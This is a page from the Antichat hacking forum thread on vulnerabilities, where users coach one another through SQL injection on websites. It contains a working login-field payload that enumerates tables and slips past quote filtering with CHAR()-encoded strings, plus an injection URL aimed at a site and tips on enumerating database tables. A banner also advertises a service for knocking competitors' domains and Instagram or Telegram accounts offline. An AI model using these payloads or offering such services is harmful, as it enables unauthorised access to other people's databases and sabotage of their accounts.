Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 496 из 1393

496

Опции темы

Поиск в этой теме

Опции просмотра

#4951

23.01.2009, 18:34

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Отправить сообщение для groundhog с помощью ICQ

Gemini12, создай у себя HTML файл с тем содержимым что я тебе написал...

#4952

23.01.2009, 18:57

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Отправить сообщение для Gemini12 с помощью ICQ

Все! Понял! Благодарю!

#4953

23.01.2009, 19:02

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от groundhog

Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--

А что зашифровал?

#4954

23.01.2009, 19:05

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Ну ты же таблицы перебираешь? Выбрал таблицу с именем 'test' значит на следующий раз тебе нужно её отбросить, вот ты её таким образом шифруешь и пишешь в условии WHERE ... ... ... ... AND table_name!=CHAR(...)+CHAR(...)+CHAR(...)+CHAR(... ). Где в CHAR отдельные ASCII коды букв - t, e, s и t.

#4955

23.01.2009, 19:20

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

2 Gemini12:

на, не парься http://slil.ru/26575601

readme в комплекте, шифруй только имена таблиц, кавычки не шифруй

#4956

23.01.2009, 19:39

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от Pashkela

2 Gemini12:

на, не парься http://slil.ru/26575601

readme в комплекте, шифруй только имена таблиц, кавычки не шифруй

пароль помнишь?

#4957

23.01.2009, 19:48

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Подскажите по Microsoft Database:
пишу

Цитата:

http://site.ru/index.php?newsid=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+MSysObjects)

выдает
Record(s) cannot be read; no read permission on 'MSysObjects'.
что можно сделать?

#4958

23.01.2009, 19:54

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

MSysObjects - системная табла. К ней довольно часто закрыт доступ.

#4959

23.01.2009, 19:54

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Разочароваться можно (как вариант).

З.Ы. Прав нету у тебя читать оттуда.

#4960

23.01.2009, 19:57

Gemini12

Познающий

Регистрация: 24.12.2008

Сообщений: 54

Провел на форуме:
253038

Репутация: 9

Цитата:

Сообщение от R1dex

MSysObjects - системная табла. К ней довольно часто закрыт доступ.

Это я уже понял

Страница 496 из 1393

496

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход